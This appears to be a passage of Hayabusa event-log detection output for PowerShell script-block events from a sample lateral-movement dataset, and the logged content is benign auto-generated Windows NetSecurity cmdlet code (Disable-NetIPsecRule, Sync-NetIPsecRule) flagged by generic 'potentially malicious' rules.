$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) 
$__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 
'ByAssociatedNetFirewa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
